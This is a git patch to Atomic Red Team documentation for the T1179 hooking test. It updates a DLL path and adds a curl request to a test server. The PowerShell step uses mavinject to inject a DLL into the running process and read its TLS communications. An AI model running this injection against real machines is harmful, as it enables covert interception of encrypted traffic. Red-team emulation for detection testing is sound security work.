From 7e8594e2889e0deec5ba92ead77063bb3e001490 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 5 Sep 2018 13:31:22 +0000 Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=Fix-T1179 --- atomics/T1179/T1179.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/atomics/T1179/T1179.md b/atomics/T1179/T1179.md index c6ecdbbd..095b9464 100644 --- a/atomics/T1179/T1179.md +++ b/atomics/T1179/T1179.md @@ -42,10 +42,12 @@ Hooks functions in PowerShell to read TLS Communications #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| file_name | Dll To Inject | Path | C:\Atomic\T1179x64.dll| +| file_name | Dll To Inject | Path | C:\AtomicRedTeam\atomics\T1179\bin\T1179x64.dll| +| server_name | TLS Server To Test Get Request | Url | https://www.example.com| #### Run it with `powershell`! ``` mavinject $pid /INJECTRUNNING #{file_name} +curl #{server_name} ```